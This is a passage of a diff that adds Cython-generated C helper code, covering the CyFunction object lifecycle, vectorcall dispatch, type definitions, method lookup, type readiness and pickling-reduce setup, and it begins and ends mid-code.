+ Py_INCREF(qualname); + op->func_qualname = qualname; + op->func_doc = NULL; +#if PY_VERSION_HEX < 0x030900B1 + op->func_classobj = NULL; +#else + ((PyCMethodObject*)op)->mm_class = NULL; +#endif + op->func_globals = globals; + Py_INCREF(op->func_globals); + Py_XINCREF(code); + op->func_code = code; + op->defaults_pyobjects = 0; + op->defaults_size = 0; + op->defaults = NULL; + op->defaults_tuple = NULL; + op->defaults_kwdict = NULL; + op->defaults_getter = NULL; + op->func_annotations = NULL; + op->func_is_coroutine = NULL; +#if CYTHON_METH_FASTCALL + switch (ml->ml_flags & (METH_VARARGS | METH_FASTCALL | METH_NOARGS | METH_O | METH_KEYWORDS | METH_METHOD)) { + case METH_NOARGS: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_NOARGS; + break; + case METH_O: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_O; + break; + case METH_METHOD | METH_FASTCALL | METH_KEYWORDS: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD; + break; + case METH_FASTCALL | METH_KEYWORDS: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS; + break; + case METH_VARARGS | METH_KEYWORDS: + __Pyx_CyFunction_func_vectorcall(op) = NULL; + break; + default: + PyErr_SetString(PyExc_SystemError, "Bad call flags for CyFunction"); + Py_DECREF(op); + return NULL; + } +#endif + return (PyObject *) op; +} +static int +__Pyx_CyFunction_clear(__pyx_CyFunctionObject *m) +{ + Py_CLEAR(m->func_closure); + Py_CLEAR(((PyCFunctionObject*)m)->m_module); + Py_CLEAR(m->func_dict); + Py_CLEAR(m->func_name); + Py_CLEAR(m->func_qualname); + Py_CLEAR(m->func_doc); + Py_CLEAR(m->func_globals); + Py_CLEAR(m->func_code); +#if PY_VERSION_HEX < 0x030900B1 + Py_CLEAR(__Pyx_CyFunction_GetClassObj(m)); +#else + { + PyObject *cls = (PyObject*) ((PyCMethodObject *) (m))->mm_class; + ((PyCMethodObject *) (m))->mm_class = NULL; + Py_XDECREF(cls); + } +#endif + Py_CLEAR(m->defaults_tuple); + Py_CLEAR(m->defaults_kwdict); + Py_CLEAR(m->func_annotations); + Py_CLEAR(m->func_is_coroutine); + if (m->defaults) { + PyObject **pydefaults = __Pyx_CyFunction_Defaults(PyObject *, m); + int i; + for (i = 0; i < m->defaults_pyobjects; i++) + Py_XDECREF(pydefaults[i]); + PyObject_Free(m->defaults); + m->defaults = NULL; + } + return 0; +} +static void __Pyx__CyFunction_dealloc(__pyx_CyFunctionObject *m) +{ + if (__Pyx_CyFunction_weakreflist(m) != NULL) + PyObject_ClearWeakRefs((PyObject *) m); + __Pyx_CyFunction_clear(m); + __Pyx_PyHeapTypeObject_GC_Del(m); +} +static void __Pyx_CyFunction_dealloc(__pyx_CyFunctionObject *m) +{ + PyObject_GC_UnTrack(m); + __Pyx__CyFunction_dealloc(m); +} +static int __Pyx_CyFunction_traverse(__pyx_CyFunctionObject *m, visitproc visit, void *arg) +{ + Py_VISIT(m->func_closure); + Py_VISIT(((PyCFunctionObject*)m)->m_module); + Py_VISIT(m->func_dict); + Py_VISIT(m->func_name); + Py_VISIT(m->func_qualname); + Py_VISIT(m->func_doc); + Py_VISIT(m->func_globals); + Py_VISIT(m->func_code); + Py_VISIT(__Pyx_CyFunction_GetClassObj(m)); + Py_VISIT(m->defaults_tuple); + Py_VISIT(m->defaults_kwdict); + Py_VISIT(m->func_is_coroutine); + if (m->defaults) { + PyObject **pydefaults = __Pyx_CyFunction_Defaults(PyObject *, m); + int i; + for (i = 0; i < m->defaults_pyobjects; i++) + Py_VISIT(pydefaults[i]); + } + return 0; +} +static PyObject* +__Pyx_CyFunction_repr(__pyx_CyFunctionObject *op) +{ +#if PY_MAJOR_VERSION >= 3 + return PyUnicode_FromFormat("", + op->func_qualname, (void *)op); +#else + return PyString_FromFormat("", + PyString_AsString(op->func_qualname), (void *)op); +#endif +} +static PyObject * __Pyx_CyFunction_CallMethod(PyObject *func, PyObject *self, PyObject *arg, PyObject *kw) { + PyCFunctionObject* f = (PyCFunctionObject*)func; + PyCFunction meth = f->m_ml->ml_meth; + Py_ssize_t size; + switch (f->m_ml->ml_flags & (METH_VARARGS | METH_KEYWORDS | METH_NOARGS | METH_O)) { + case METH_VARARGS: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) + return (*meth)(self, arg); + break; + case METH_VARARGS | METH_KEYWORDS: + return (*(PyCFunctionWithKeywords)(void*)meth)(self, arg, kw); + case METH_NOARGS: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) { + size = PyTuple_GET_SIZE(arg); + if (likely(size == 0)) + return (*meth)(self, NULL); + PyErr_Format(PyExc_TypeError, + "%.200s() takes no arguments (%" CYTHON_FORMAT_SSIZE_T "d given)", + f->m_ml->ml_name, size); + return NULL; + } + break; + case METH_O: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) { + size = PyTuple_GET_SIZE(arg); + if (likely(size == 1)) { + PyObject *result, *arg0; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + arg0 = PyTuple_GET_ITEM(arg, 0); + #else + arg0 = PySequence_ITEM(arg, 0); if (unlikely(!arg0)) return NULL; + #endif + result = (*meth)(self, arg0); + #if !(CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS) + Py_DECREF(arg0); + #endif + return result; + } + PyErr_Format(PyExc_TypeError, + "%.200s() takes exactly one argument (%" CYTHON_FORMAT_SSIZE_T "d given)", + f->m_ml->ml_name, size); + return NULL; + } + break; + default: + PyErr_SetString(PyExc_SystemError, "Bad call flags for CyFunction"); + return NULL; + } + PyErr_Format(PyExc_TypeError, "%.200s() takes no keyword arguments", + f->m_ml->ml_name); + return NULL; +} +static CYTHON_INLINE PyObject *__Pyx_CyFunction_Call(PyObject *func, PyObject *arg, PyObject *kw) { + return __Pyx_CyFunction_CallMethod(func, ((PyCFunctionObject*)func)->m_self, arg, kw); +} +static PyObject *__Pyx_CyFunction_CallAsMethod(PyObject *func, PyObject *args, PyObject *kw) { + PyObject *result; + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *) func; +#if CYTHON_METH_FASTCALL + __pyx_vectorcallfunc vc = __Pyx_CyFunction_func_vectorcall(cyfunc); + if (vc) { +#if CYTHON_ASSUME_SAFE_MACROS + return __Pyx_PyVectorcall_FastCallDict(func, vc, &PyTuple_GET_ITEM(args, 0), (size_t)PyTuple_GET_SIZE(args), kw); +#else + (void) &__Pyx_PyVectorcall_FastCallDict; + return PyVectorcall_Call(func, args, kw); +#endif + } +#endif + if ((cyfunc->flags & __Pyx_CYFUNCTION_CCLASS) && !(cyfunc->flags & __Pyx_CYFUNCTION_STATICMETHOD)) { + Py_ssize_t argc; + PyObject *new_args; + PyObject *self; + argc = PyTuple_GET_SIZE(args); + new_args = PyTuple_GetSlice(args, 1, argc); + if (unlikely(!new_args)) + return NULL; + self = PyTuple_GetItem(args, 0); + if (unlikely(!self)) { + Py_DECREF(new_args); +#if PY_MAJOR_VERSION > 2 + PyErr_Format(PyExc_TypeError, + "unbound method %.200S() needs an argument", + cyfunc->func_qualname); +#else + PyErr_SetString(PyExc_TypeError, + "unbound method needs an argument"); +#endif + return NULL; + } + result = __Pyx_CyFunction_CallMethod(func, self, new_args, kw); + Py_DECREF(new_args); + } else { + result = __Pyx_CyFunction_Call(func, args, kw); + } + return result; +} +#if CYTHON_METH_FASTCALL +static CYTHON_INLINE int __Pyx_CyFunction_Vectorcall_CheckArgs(__pyx_CyFunctionObject *cyfunc, Py_ssize_t nargs, PyObject *kwnames) +{ + int ret = 0; + if ((cyfunc->flags & __Pyx_CYFUNCTION_CCLASS) && !(cyfunc->flags & __Pyx_CYFUNCTION_STATICMETHOD)) { + if (unlikely(nargs < 1)) { + PyErr_Format(PyExc_TypeError, "%.200s() needs an argument", + ((PyCFunctionObject*)cyfunc)->m_ml->ml_name); + return -1; + } + ret = 1; + } + if (unlikely(kwnames) && unlikely(PyTuple_GET_SIZE(kwnames))) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes no keyword arguments", ((PyCFunctionObject*)cyfunc)->m_ml->ml_name); + return -1; + } + return ret; +} +static PyObject * __Pyx_CyFunction_Vectorcall_NOARGS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, kwnames)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + if (unlikely(nargs != 0)) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes no arguments (%" CYTHON_FORMAT_SSIZE_T "d given)", + def->ml_name, nargs); + return NULL; + } + return def->ml_meth(self, NULL); +} +static PyObject * __Pyx_CyFunction_Vectorcall_O(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, kwnames)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + if (unlikely(nargs != 1)) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes exactly one argument (%" CYTHON_FORMAT_SSIZE_T "d given)", + def->ml_name, nargs); + return NULL; + } + return def->ml_meth(self, args[0]); +} +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, NULL)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + return ((_PyCFunctionFastWithKeywords)(void(*)(void))def->ml_meth)(self, args, nargs, kwnames); +} +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; + PyTypeObject *cls = (PyTypeObject *) __Pyx_CyFunction_GetClassObj(cyfunc); +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, NULL)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + return ((__Pyx_PyCMethod)(void(*)(void))def->ml_meth)(self, cls, args, (size_t)nargs, kwnames); +} +#endif +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_CyFunctionType_slots[] = { + {Py_tp_dealloc, (void *)__Pyx_CyFunction_dealloc}, + {Py_tp_repr, (void *)__Pyx_CyFunction_repr}, + {Py_tp_call, (void *)__Pyx_CyFunction_CallAsMethod}, + {Py_tp_traverse, (void *)__Pyx_CyFunction_traverse}, + {Py_tp_clear, (void *)__Pyx_CyFunction_clear}, + {Py_tp_methods, (void *)__pyx_CyFunction_methods}, + {Py_tp_members, (void *)__pyx_CyFunction_members}, + {Py_tp_getset, (void *)__pyx_CyFunction_getsets}, + {Py_tp_descr_get, (void *)__Pyx_PyMethod_New}, + {0, 0}, +}; +static PyType_Spec __pyx_CyFunctionType_spec = { + __PYX_TYPE_MODULE_PREFIX "cython_function_or_method", + sizeof(__pyx_CyFunctionObject), + 0, +#ifdef Py_TPFLAGS_METHOD_DESCRIPTOR + Py_TPFLAGS_METHOD_DESCRIPTOR | +#endif +#if (defined(_Py_TPFLAGS_HAVE_VECTORCALL) && CYTHON_METH_FASTCALL) + _Py_TPFLAGS_HAVE_VECTORCALL | +#endif + Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC | Py_TPFLAGS_BASETYPE, + __pyx_CyFunctionType_slots +}; +#else +static PyTypeObject __pyx_CyFunctionType_type = { + PyVarObject_HEAD_INIT(0, 0) + __PYX_TYPE_MODULE_PREFIX "cython_function_or_method", + sizeof(__pyx_CyFunctionObject), + 0, + (destructor) __Pyx_CyFunction_dealloc, +#if !CYTHON_METH_FASTCALL + 0, +#elif CYTHON_BACKPORT_VECTORCALL + (printfunc)offsetof(__pyx_CyFunctionObject, func_vectorcall), +#else + offsetof(PyCFunctionObject, vectorcall), +#endif + 0, + 0, +#if PY_MAJOR_VERSION < 3 + 0, +#else + 0, +#endif + (reprfunc) __Pyx_CyFunction_repr, + 0, + 0, + 0, + 0, + __Pyx_CyFunction_CallAsMethod, + 0, + 0, + 0, + 0, +#ifdef Py_TPFLAGS_METHOD_DESCRIPTOR + Py_TPFLAGS_METHOD_DESCRIPTOR | +#endif +#ifdef _Py_TPFLAGS_HAVE_VECTORCALL + _Py_TPFLAGS_HAVE_VECTORCALL | +#endif + Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC | Py_TPFLAGS_BASETYPE, + 0, + (traverseproc) __Pyx_CyFunction_traverse, + (inquiry) __Pyx_CyFunction_clear, + 0, +#if PY_VERSION_HEX < 0x030500A0 + offsetof(__pyx_CyFunctionObject, func_weakreflist), +#else + offsetof(PyCFunctionObject, m_weakreflist), +#endif + 0, + 0, + __pyx_CyFunction_methods, + __pyx_CyFunction_members, + __pyx_CyFunction_getsets, + 0, + 0, + __Pyx_PyMethod_New, + 0, + offsetof(__pyx_CyFunctionObject, func_dict), + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, +#if PY_VERSION_HEX >= 0x030400a1 + 0, +#endif +#if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, +#endif +#if __PYX_NEED_TP_PRINT_SLOT + 0, +#endif +#if PY_VERSION_HEX >= 0x030C0000 + 0, +#endif +#if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, +#endif +}; +#endif +static int __pyx_CyFunction_init(PyObject *module) { +#if CYTHON_USE_TYPE_SPECS + __pyx_CyFunctionType = __Pyx_FetchCommonTypeFromSpec(module, &__pyx_CyFunctionType_spec, NULL); +#else + CYTHON_UNUSED_VAR(module); + __pyx_CyFunctionType = __Pyx_FetchCommonType(&__pyx_CyFunctionType_type); +#endif + if (unlikely(__pyx_CyFunctionType == NULL)) { + return -1; + } + return 0; +} +static CYTHON_INLINE void *__Pyx_CyFunction_InitDefaults(PyObject *func, size_t size, int pyobjects) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults = PyObject_Malloc(size); + if (unlikely(!m->defaults)) + return PyErr_NoMemory(); + memset(m->defaults, 0, size); + m->defaults_pyobjects = pyobjects; + m->defaults_size = size; + return m->defaults; +} +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsTuple(PyObject *func, PyObject *tuple) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults_tuple = tuple; + Py_INCREF(tuple); +} +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsKwDict(PyObject *func, PyObject *dict) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults_kwdict = dict; + Py_INCREF(dict); +} +static CYTHON_INLINE void __Pyx_CyFunction_SetAnnotationsDict(PyObject *func, PyObject *dict) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->func_annotations = dict; + Py_INCREF(dict); +} + +/* CythonFunction */ +static PyObject *__Pyx_CyFunction_New(PyMethodDef *ml, int flags, PyObject* qualname, + PyObject *closure, PyObject *module, PyObject* globals, PyObject* code) { + PyObject *op = __Pyx_CyFunction_Init( + PyObject_GC_New(__pyx_CyFunctionObject, __pyx_CyFunctionType), + ml, flags, qualname, closure, module, globals, code + ); + if (likely(op)) { + PyObject_GC_Track(op); + } + return op; +} + +/* PyObjectCallNoArg */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallNoArg(PyObject *func) { + PyObject *arg = NULL; + return __Pyx_PyObject_FastCall(func, (&arg)+1, 0 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET); +} + +/* PyObjectGetMethod */ +static int __Pyx_PyObject_GetMethod(PyObject *obj, PyObject *name, PyObject **method) { + PyObject *attr; +#if CYTHON_UNPACK_METHODS && CYTHON_COMPILING_IN_CPYTHON && CYTHON_USE_PYTYPE_LOOKUP + __Pyx_TypeName type_name; + PyTypeObject *tp = Py_TYPE(obj); + PyObject *descr; + descrgetfunc f = NULL; + PyObject **dictptr, *dict; + int meth_found = 0; + assert (*method == NULL); + if (unlikely(tp->tp_getattro != PyObject_GenericGetAttr)) { + attr = __Pyx_PyObject_GetAttrStr(obj, name); + goto try_unpack; + } + if (unlikely(tp->tp_dict == NULL) && unlikely(PyType_Ready(tp) < 0)) { + return 0; + } + descr = _PyType_Lookup(tp, name); + if (likely(descr != NULL)) { + Py_INCREF(descr); +#if defined(Py_TPFLAGS_METHOD_DESCRIPTOR) && Py_TPFLAGS_METHOD_DESCRIPTOR + if (__Pyx_PyType_HasFeature(Py_TYPE(descr), Py_TPFLAGS_METHOD_DESCRIPTOR)) +#elif PY_MAJOR_VERSION >= 3 + #ifdef __Pyx_CyFunction_USED + if (likely(PyFunction_Check(descr) || __Pyx_IS_TYPE(descr, &PyMethodDescr_Type) || __Pyx_CyFunction_Check(descr))) + #else + if (likely(PyFunction_Check(descr) || __Pyx_IS_TYPE(descr, &PyMethodDescr_Type))) + #endif +#else + #ifdef __Pyx_CyFunction_USED + if (likely(PyFunction_Check(descr) || __Pyx_CyFunction_Check(descr))) + #else + if (likely(PyFunction_Check(descr))) + #endif +#endif + { + meth_found = 1; + } else { + f = Py_TYPE(descr)->tp_descr_get; + if (f != NULL && PyDescr_IsData(descr)) { + attr = f(descr, obj, (PyObject *)Py_TYPE(obj)); + Py_DECREF(descr); + goto try_unpack; + } + } + } + dictptr = _PyObject_GetDictPtr(obj); + if (dictptr != NULL && (dict = *dictptr) != NULL) { + Py_INCREF(dict); + attr = __Pyx_PyDict_GetItemStr(dict, name); + if (attr != NULL) { + Py_INCREF(attr); + Py_DECREF(dict); + Py_XDECREF(descr); + goto try_unpack; + } + Py_DECREF(dict); + } + if (meth_found) { + *method = descr; + return 1; + } + if (f != NULL) { + attr = f(descr, obj, (PyObject *)Py_TYPE(obj)); + Py_DECREF(descr); + goto try_unpack; + } + if (likely(descr != NULL)) { + *method = descr; + return 0; + } + type_name = __Pyx_PyType_GetName(tp); + PyErr_Format(PyExc_AttributeError, +#if PY_MAJOR_VERSION >= 3 + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%U'", + type_name, name); +#else + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%.400s'", + type_name, PyString_AS_STRING(name)); +#endif + __Pyx_DECREF_TypeName(type_name); + return 0; +#else + attr = __Pyx_PyObject_GetAttrStr(obj, name); + goto try_unpack; +#endif +try_unpack: +#if CYTHON_UNPACK_METHODS + if (likely(attr) && PyMethod_Check(attr) && likely(PyMethod_GET_SELF(attr) == obj)) { + PyObject *function = PyMethod_GET_FUNCTION(attr); + Py_INCREF(function); + Py_DECREF(attr); + *method = function; + return 1; + } +#endif + *method = attr; + return 0; +} + +/* PyObjectCallMethod0 */ +static PyObject* __Pyx_PyObject_CallMethod0(PyObject* obj, PyObject* method_name) { + PyObject *method = NULL, *result = NULL; + int is_method = __Pyx_PyObject_GetMethod(obj, method_name, &method); + if (likely(is_method)) { + result = __Pyx_PyObject_CallOneArg(method, obj); + Py_DECREF(method); + return result; + } + if (unlikely(!method)) goto bad; + result = __Pyx_PyObject_CallNoArg(method); + Py_DECREF(method); +bad: + return result; +} + +/* ValidateBasesTuple */ +#if CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API || CYTHON_USE_TYPE_SPECS +static int __Pyx_validate_bases_tuple(const char *type_name, Py_ssize_t dictoffset, PyObject *bases) { + Py_ssize_t i, n = PyTuple_GET_SIZE(bases); + for (i = 1; i < n; i++) + { + PyObject *b0 = PyTuple_GET_ITEM(bases, i); + PyTypeObject *b; +#if PY_MAJOR_VERSION < 3 + if (PyClass_Check(b0)) + { + PyErr_Format(PyExc_TypeError, "base class '%.200s' is an old-style class", + PyString_AS_STRING(((PyClassObject*)b0)->cl_name)); + return -1; + } +#endif + b = (PyTypeObject*) b0; + if (!__Pyx_PyType_HasFeature(b, Py_TPFLAGS_HEAPTYPE)) + { + __Pyx_TypeName b_name = __Pyx_PyType_GetName(b); + PyErr_Format(PyExc_TypeError, + "base class '" __Pyx_FMT_TYPENAME "' is not a heap type", b_name); + __Pyx_DECREF_TypeName(b_name); + return -1; + } + if (dictoffset == 0 && b->tp_dictoffset) + { + __Pyx_TypeName b_name = __Pyx_PyType_GetName(b); + PyErr_Format(PyExc_TypeError, + "extension type '%.200s' has no __dict__ slot, " + "but base type '" __Pyx_FMT_TYPENAME "' has: " + "either add 'cdef dict __dict__' to the extension type " + "or add '__slots__ = [...]' to the base type", + type_name, b_name); + __Pyx_DECREF_TypeName(b_name); + return -1; + } + } + return 0; +} +#endif + +/* PyType_Ready */ +static int __Pyx_PyType_Ready(PyTypeObject *t) { +#if CYTHON_USE_TYPE_SPECS || !(CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API) || defined(PYSTON_MAJOR_VERSION) + (void)__Pyx_PyObject_CallMethod0; +#if CYTHON_USE_TYPE_SPECS + (void)__Pyx_validate_bases_tuple; +#endif + return PyType_Ready(t); +#else + int r; + PyObject *bases = __Pyx_PyType_GetSlot(t, tp_bases, PyObject*); + if (bases && unlikely(__Pyx_validate_bases_tuple(t->tp_name, t->tp_dictoffset, bases) == -1)) + return -1; +#if PY_VERSION_HEX >= 0x03050000 && !defined(PYSTON_MAJOR_VERSION) + { + int gc_was_enabled; + #if PY_VERSION_HEX >= 0x030A00b1 + gc_was_enabled = PyGC_Disable(); + (void)__Pyx_PyObject_CallMethod0; + #else + PyObject *ret, *py_status; + PyObject *gc = NULL; + #if PY_VERSION_HEX >= 0x030700a1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM+0 >= 0x07030400) + gc = PyImport_GetModule(__pyx_kp_u_gc); + #endif + if (unlikely(!gc)) gc = PyImport_Import(__pyx_kp_u_gc); + if (unlikely(!gc)) return -1; + py_status = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_isenabled); + if (unlikely(!py_status)) { + Py_DECREF(gc); + return -1; + } + gc_was_enabled = __Pyx_PyObject_IsTrue(py_status); + Py_DECREF(py_status); + if (gc_was_enabled > 0) { + ret = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_disable); + if (unlikely(!ret)) { + Py_DECREF(gc); + return -1; + } + Py_DECREF(ret); + } else if (unlikely(gc_was_enabled == -1)) { + Py_DECREF(gc); + return -1; + } + #endif + t->tp_flags |= Py_TPFLAGS_HEAPTYPE; +#if PY_VERSION_HEX >= 0x030A0000 + t->tp_flags |= Py_TPFLAGS_IMMUTABLETYPE; +#endif +#else + (void)__Pyx_PyObject_CallMethod0; +#endif + r = PyType_Ready(t); +#if PY_VERSION_HEX >= 0x03050000 && !defined(PYSTON_MAJOR_VERSION) + t->tp_flags &= ~Py_TPFLAGS_HEAPTYPE; + #if PY_VERSION_HEX >= 0x030A00b1 + if (gc_was_enabled) + PyGC_Enable(); + #else + if (gc_was_enabled) { + PyObject *tp, *v, *tb; + PyErr_Fetch(&tp, &v, &tb); + ret = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_enable); + if (likely(ret || r == -1)) { + Py_XDECREF(ret); + PyErr_Restore(tp, v, tb); + } else { + Py_XDECREF(tp); + Py_XDECREF(v); + Py_XDECREF(tb); + r = -1; + } + } + Py_DECREF(gc); + #endif + } +#endif + return r; +#endif +} + +/* PyObject_GenericGetAttrNoDict */ +#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static PyObject *__Pyx_RaiseGenericGetAttributeError(PyTypeObject *tp, PyObject *attr_name) { + __Pyx_TypeName type_name = __Pyx_PyType_GetName(tp); + PyErr_Format(PyExc_AttributeError, +#if PY_MAJOR_VERSION >= 3 + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%U'", + type_name, attr_name); +#else + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%.400s'", + type_name, PyString_AS_STRING(attr_name)); +#endif + __Pyx_DECREF_TypeName(type_name); + return NULL; +} +static CYTHON_INLINE PyObject* __Pyx_PyObject_GenericGetAttrNoDict(PyObject* obj, PyObject* attr_name) { + PyObject *descr; + PyTypeObject *tp = Py_TYPE(obj); + if (unlikely(!PyString_Check(attr_name))) { + return PyObject_GenericGetAttr(obj, attr_name); + } + assert(!tp->tp_dictoffset); + descr = _PyType_Lookup(tp, attr_name); + if (unlikely(!descr)) { + return __Pyx_RaiseGenericGetAttributeError(tp, attr_name); + } + Py_INCREF(descr); + #if PY_MAJOR_VERSION < 3 + if (likely(PyType_HasFeature(Py_TYPE(descr), Py_TPFLAGS_HAVE_CLASS))) + #endif + { + descrgetfunc f = Py_TYPE(descr)->tp_descr_get; + if (unlikely(f)) { + PyObject *res = f(descr, obj, (PyObject *)tp); + Py_DECREF(descr); + return res; + } + } + return descr; +} +#endif + +/* PyObject_GenericGetAttr */ +#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static PyObject* __Pyx_PyObject_GenericGetAttr(PyObject* obj, PyObject* attr_name) { + if (unlikely(Py_TYPE(obj)->tp_dictoffset)) { + return PyObject_GenericGetAttr(obj, attr_name); + } + return __Pyx_PyObject_GenericGetAttrNoDict(obj, attr_name); +} +#endif + +/* SetupReduce */ +#if !CYTHON_COMPILING_IN_LIMITED_API +static int __Pyx_setup_reduce_is_named(PyObject* meth, PyObject* name) { + int ret; + PyObject *name_attr; + name_attr = __Pyx_PyObject_GetAttrStrNoError(meth, __pyx_n_s_name_2); + if (likely(name_attr)) { + ret = PyObject_RichCompareBool(name_attr, name, Py_EQ); + } else { + ret = -1; + } + if (unlikely(ret < 0)) { + PyErr_Clear(); + ret = 0; + } + Py_XDECREF(name_attr); + return ret; +} +static int __Pyx_setup_reduce(PyObject* type_obj) { + int ret = 0; + PyObject *object_reduce = NULL; + PyObject *object_getstate = NULL; + PyObject *object_reduce_ex = NULL; + PyObject *reduce = NULL; + PyObject *reduce_ex = NULL; + PyObject *reduce_cython = NULL; + PyObject *setstate = NULL; + PyObject *setstate_cython = NULL; + PyObject *getstate = NULL; +#if CYTHON_USE_PYTYPE_LOOKUP + getstate = _PyType_Lookup((PyTypeObject*)type_obj, __pyx_n_s_getstate); +#else + getstate = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_getstate); + if (!getstate && PyErr_Occurred()) { + goto __PYX_BAD; + } +#endif + if (getstate) { +#if CYTHON_USE_PYTYPE_LOOKUP + object_getstate = _PyType_Lookup(&PyBaseObject_Type, __pyx_n_s_getstate); +#else + object_getstate = __Pyx_PyObject_GetAttrStrNoError((PyObject*)&PyBaseObject_Type, __pyx_n_s_getstate); + if (!object_getstate && PyErr_Occurred()) { + goto __PYX_BAD; + } +#endif + if (object_getstate != getstate) { + goto __PYX_GOOD; + } + } +#if CYTHON_USE_PYTYPE_LOOKUP + object_reduce_ex = _PyType_Lookup(&PyBaseObject_Type, __pyx_n_s_reduce_ex); if (!object_reduce_ex) goto __PYX_BAD; +#else + object_reduce_ex = __Pyx_PyObject_GetAttrStr((PyObject*)&PyBaseObject_Type, __pyx_n_s_reduce_ex); if (!object_reduce_ex) goto __PYX_BAD; +#endif + reduce_ex = __Pyx_PyObject_GetAttrStr(type_obj, __pyx_n_s_reduce_ex); if (unlikely(!reduce_ex)) goto __PYX_BAD; + if (reduce_ex == object_reduce_ex) { +#if CYTHON_USE_PYTYPE_LOOKUP + object_reduce = _PyType_Lookup(&PyBaseObject_Type, __pyx_n_s_reduce); if (!object_reduce) goto __PYX_BAD; +#else + object_reduce = __Pyx_PyObject_GetAttrStr((PyObject*)&PyBaseObject_Type, 